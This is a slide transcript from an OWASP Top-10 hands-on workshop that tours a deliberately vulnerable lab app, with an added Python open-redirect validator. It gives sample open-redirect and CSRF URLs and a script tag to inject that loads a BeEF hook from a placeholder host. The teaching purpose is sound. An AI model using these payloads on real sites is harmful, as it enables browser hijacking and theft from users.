«OWASP Top 10 hands on workshop» by Stanislav Breslavskyi
Transcript of «OWASP Top 10 hands on workshop» by Stanislav Breslavskyi
OWASP Top-10 Hands-on Workshop
whoami
• Security Engineer @ SoftServe
• NU "LP" student
What do we do?
• Web Application Security Assessment
• Penetration Testing
• Secure Software Development Lifecycle
Open Web Application Security Project
• Non-profit organization
• Numerous chapters around the globe
• Everyone can join
• Open-Source
Meetings and conferences all around the globe
@AppSecEU ‘15 in Amsterdam
Knowledge base
OWASP Top-10
• Injection
• Broken Auth and Session Management
• XSS
• Insecure Direct Object References
• Security Misconfiguration
• Sensitive Data Exposure
• Missing Function Level Control
• CSRF
• Using Known Vulnerable Components
• Unvalidated Redirects and Forwards
OWASP is GOOD!
Hackers
• Methodologies on how to hack
Developers
• Methodologies on how to implement things securely and fix them
Testers
• The same as hackers do
• Methodologies on how to test the security of their projects
Demo Time
Rules
• Either go through the scenario with me or try to find the 10 vulnerabilities by yourself.
• No scanners (DDoS alert).
• Do not attack infrastructure. Only web application vulnerabilities here.
• Do not attack people around you.
• No punching.
Let's begin
• 172.16.216.28:5000/login?redirect_url=google.com
• 172.16.216.28:5000/change_password=1234
• Credentials:
Open Redirect
example.com/smth?redirect_url=http://google.com
CSRF
bank.com/trans?acc1=1234&acc2=4321&amount=10000
Open Redirect + CSRF
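A server-side check for a `redirect_url` parameter like the one on the login page above, as an added example (not code from the workshop or the hole-blog project); the allowed host is assumed to be the lab server from the slides, and the check also covers protocol-relative and backslash forms that a plain "starts with /" test misses:

```python
from urllib.parse import urlsplit, urlunsplit

# Assumed allow-list: only the lab application itself is a valid redirect host.
ALLOWED_HOSTS = {"172.16.216.28:5000"}
DEFAULT_TARGET = "/"


def safe_redirect_target(redirect_url, allowed_hosts=ALLOWED_HOSTS, default=DEFAULT_TARGET):
    """Return a redirect target that stays on the application, or `default`.

    Accepts a same-site path ("/change_password") or an absolute http(s) URL
    whose host:port is in the allow-list. Anything else falls back to `default`:
    external hosts, protocol-relative "//host", backslash variants, non-http
    schemes such as javascript:, and userinfo tricks ("allowed@other").
    """
    if not redirect_url:
        return default
    candidate = redirect_url.strip()
    # Whitespace or control characters inside the value are a tampering signal.
    if any(ord(c) <= 0x20 for c in candidate):
        return default
    # Browsers treat a leading backslash like a slash, so normalise before parsing.
    candidate = candidate.replace("\\", "/")
    parts = urlsplit(candidate)
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: only a single-slash absolute path is accepted.
        if candidate.startswith("/") and not candidate.startswith("//"):
            return candidate
        return default
    if parts.scheme not in ("http", "https"):
        return default
    # Compare the raw netloc: a userinfo part makes "host@other" fail the match.
    if parts.netloc not in allowed_hosts:
        return default
    return urlunsplit(parts)
```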
Cross-Site Scripting
Supply JS code instead of valid data, which will then be processed by the browser
Broken Auth
Session management flaws (HTTPOnly flag is missing in our case)
XSS + Broken Authentication
Inject this script into the website:
<script src="<url to the hook>" type="text/javascript"></script>
BeEF
SQL-injection
Supply SQL operators and statements instead of valid data, which will then be processed by the server as SQL queries (not as strings)
Security misconfiguration
Crypto misuse, wrong DB configuration, etc.
Sensitive Data Exposure
Critical info leakage
SQLi + Security Misconfiguration + Sensitive Data Exposure
Insecure Direct Object Reference
Access a file you have no permission to
Missing Function Level Control
Access to a restricted (sensitive) function.
Using Components with Known Vulnerabilities
Vulnerable OS, libraries, frameworks, CMS, algorithms, etc.
Everything else …
What to do next?
• Try it by yourself: https://github.com/Varyagovich/hole-blog
• Try to fix the project
• Use OWASP projects (attack/prevention cheat sheets and tools)
• Contribute!
http://owasp-lviv.blogspot.com/
STAY SAFE!